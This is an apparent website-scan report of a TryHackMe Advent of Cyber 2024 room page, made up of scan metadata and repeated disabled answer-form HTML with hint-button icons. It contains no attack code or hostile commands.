tryhackme.com
172.67.27.10
Public Scan
URL:
https://tryhackme.com/r/room/adventofcyber2024?utm_source=customer.io&utm_medium=email&utm_campaign=aoc2024&utm_conten...
Submission: On December 05 via api from RU — Scanned from IT
Form analysis
40 forms found in the DOM
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="1" name="1" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="1" name="1" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="2" name="2" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="3" name="3" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="4" name="4" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="5" name="5" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="6" name="6" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="7" name="7" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="8" name="8" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="1" name="1" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="1" name="1" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="1" name="1" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="1" name="1" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="1" name="1" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="2" name="2" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button><button color="hint" type="button" role="button" class="sc-kAyceB dtlBUx sc-beSSEr epJuEK"><svg
aria-hidden="true" focusable="false" data-prefix="far" data-icon="lightbulb" class="svg-inline--fa fa-lightbulb " role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512">
<path fill="currentColor"
d="M112.1 454.3c0 6.297 1.816 12.44 5.284 17.69l17.14 25.69c5.25 7.875 17.17 14.28 26.64 14.28h61.67c9.438 0 21.36-6.401 26.61-14.28l17.08-25.68c2.938-4.438 5.348-12.37 5.348-17.7L272 415.1h-160L112.1 454.3zM192 0C90.02 .3203 16 82.97 16 175.1c0 44.38 16.44 84.84 43.56 115.8c16.53 18.84 42.34 58.23 52.22 91.45c.0313 .25 .0938 .5166 .125 .7823h160.2c.0313-.2656 .0938-.5166 .125-.7823c9.875-33.22 35.69-72.61 52.22-91.45C351.6 260.8 368 220.4 368 175.1C368 78.8 289.2 .0039 192 0zM288.4 260.1c-15.66 17.85-35.04 46.3-49.05 75.89h-94.61c-14.01-29.59-33.39-58.04-49.04-75.88C75.24 236.8 64 206.1 64 175.1C64 113.3 112.1 48.25 191.1 48C262.6 48 320 105.4 320 175.1C320 206.1 308.8 236.8 288.4 260.1zM176 80C131.9 80 96 115.9 96 160c0 8.844 7.156 16 16 16S128 168.8 128 160c0-26.47 21.53-48 48-48c8.844 0 16-7.148 16-15.99S184.8 80 176 80z">
</path>
</svg>Hint</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="3" name="3" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="4" name="4" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button><button color="hint" type="button" role="button" class="sc-kAyceB dtlBUx sc-beSSEr epJuEK"><svg
aria-hidden="true" focusable="false" data-prefix="far" data-icon="lightbulb" class="svg-inline--fa fa-lightbulb " role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512">
<path fill="currentColor"
d="M112.1 454.3c0 6.297 1.816 12.44 5.284 17.69l17.14 25.69c5.25 7.875 17.17 14.28 26.64 14.28h61.67c9.438 0 21.36-6.401 26.61-14.28l17.08-25.68c2.938-4.438 5.348-12.37 5.348-17.7L272 415.1h-160L112.1 454.3zM192 0C90.02 .3203 16 82.97 16 175.1c0 44.38 16.44 84.84 43.56 115.8c16.53 18.84 42.34 58.23 52.22 91.45c.0313 .25 .0938 .5166 .125 .7823h160.2c.0313-.2656 .0938-.5166 .125-.7823c9.875-33.22 35.69-72.61 52.22-91.45C351.6 260.8 368 220.4 368 175.1C368 78.8 289.2 .0039 192 0zM288.4 260.1c-15.66 17.85-35.04 46.3-49.05 75.89h-94.61c-14.01-29.59-33.39-58.04-49.04-75.88C75.24 236.8 64 206.1 64 175.1C64 113.3 112.1 48.25 191.1 48C262.6 48 320 105.4 320 175.1C320 206.1 308.8 236.8 288.4 260.1zM176 80C131.9 80 96 115.9 96 160c0 8.844 7.156 16 16 16S128 168.8 128 160c0-26.47 21.53-48 48-48c8.844 0 16-7.148 16-15.99S184.8 80 176 80z">
</path>
</svg>Hint</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="5" name="5" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="6" name="6" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="1" name="1" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="2" name="2" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button><button color="hint" type="button" role="button" class="sc-kAyceB dtlBUx sc-beSSEr epJuEK"><svg
aria-hidden="true" focusable="false" data-prefix="far" data-icon="lightbulb" class="svg-inline--fa fa-lightbulb " role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512">
<path fill="currentColor"
d="M112.1 454.3c0 6.297 1.816 12.44 5.284 17.69l17.14 25.69c5.25 7.875 17.17 14.28 26.64 14.28h61.67c9.438 0 21.36-6.401 26.61-14.28l17.08-25.68c2.938-4.438 5.348-12.37 5.348-17.7L272 415.1h-160L112.1 454.3zM192 0C90.02 .3203 16 82.97 16 175.1c0 44.38 16.44 84.84 43.56 115.8c16.53 18.84 42.34 58.23 52.22 91.45c.0313 .25 .0938 .5166 .125 .7823h160.2c.0313-.2656 .0938-.5166 .125-.7823c9.875-33.22 35.69-72.61 52.22-91.45C351.6 260.8 368 220.4 368 175.1C368 78.8 289.2 .0039 192 0zM288.4 260.1c-15.66 17.85-35.04 46.3-49.05 75.89h-94.61c-14.01-29.59-33.39-58.04-49.04-75.88C75.24 236.8 64 206.1 64 175.1C64 113.3 112.1 48.25 191.1 48C262.6 48 320 105.4 320 175.1C320 206.1 308.8 236.8 288.4 260.1zM176 80C131.9 80 96 115.9 96 160c0 8.844 7.156 16 16 16S128 168.8 128 160c0-26.47 21.53-48 48-48c8.844 0 16-7.148 16-15.99S184.8 80 176 80z">
</path>
</svg>Hint</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="3" name="3" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="4" name="4" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button><button color="hint" type="button" role="button" class="sc-kAyceB dtlBUx sc-beSSEr epJuEK"><svg
aria-hidden="true" focusable="false" data-prefix="far" data-icon="lightbulb" class="svg-inline--fa fa-lightbulb " role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512">
<path fill="currentColor"
d="M112.1 454.3c0 6.297 1.816 12.44 5.284 17.69l17.14 25.69c5.25 7.875 17.17 14.28 26.64 14.28h61.67c9.438 0 21.36-6.401 26.61-14.28l17.08-25.68c2.938-4.438 5.348-12.37 5.348-17.7L272 415.1h-160L112.1 454.3zM192 0C90.02 .3203 16 82.97 16 175.1c0 44.38 16.44 84.84 43.56 115.8c16.53 18.84 42.34 58.23 52.22 91.45c.0313 .25 .0938 .5166 .125 .7823h160.2c.0313-.2656 .0938-.5166 .125-.7823c9.875-33.22 35.69-72.61 52.22-91.45C351.6 260.8 368 220.4 368 175.1C368 78.8 289.2 .0039 192 0zM288.4 260.1c-15.66 17.85-35.04 46.3-49.05 75.89h-94.61c-14.01-29.59-33.39-58.04-49.04-75.88C75.24 236.8 64 206.1 64 175.1C64 113.3 112.1 48.25 191.1 48C262.6 48 320 105.4 320 175.1C320 206.1 308.8 236.8 288.4 260.1zM176 80C131.9 80 96 115.9 96 160c0 8.844 7.156 16 16 16S128 168.8 128 160c0-26.47 21.53-48 48-48c8.844 0 16-7.148 16-15.99S184.8 80 176 80z">
</path>
</svg>Hint</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="5" name="5" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="6" name="6" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="1" name="1" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button><button color="hint" type="button" role="button" class="sc-kAyceB dtlBUx sc-beSSEr epJuEK"><svg
aria-hidden="true" focusable="false" data-prefix="far" data-icon="lightbulb" class="svg-inline--fa fa-lightbulb " role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512">
<path fill="currentColor"
d="M112.1 454.3c0 6.297 1.816 12.44 5.284 17.69l17.14 25.69c5.25 7.875 17.17 14.28 26.64 14.28h61.67c9.438 0 21.36-6.401 26.61-14.28l17.08-25.68c2.938-4.438 5.348-12.37 5.348-17.7L272 415.1h-160L112.1 454.3zM192 0C90.02 .3203 16 82.97 16 175.1c0 44.38 16.44 84.84 43.56 115.8c16.53 18.84 42.34 58.23 52.22 91.45c.0313 .25 .0938 .5166 .125 .7823h160.2c.0313-.2656 .0938-.5166 .125-.7823c9.875-33.22 35.69-72.61 52.22-91.45C351.6 260.8 368 220.4 368 175.1C368 78.8 289.2 .0039 192 0zM288.4 260.1c-15.66 17.85-35.04 46.3-49.05 75.89h-94.61c-14.01-29.59-33.39-58.04-49.04-75.88C75.24 236.8 64 206.1 64 175.1C64 113.3 112.1 48.25 191.1 48C262.6 48 320 105.4 320 175.1C320 206.1 308.8 236.8 288.4 260.1zM176 80C131.9 80 96 115.9 96 160c0 8.844 7.156 16 16 16S128 168.8 128 160c0-26.47 21.53-48 48-48c8.844 0 16-7.148 16-15.99S184.8 80 176 80z">
</path>
</svg>Hint</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
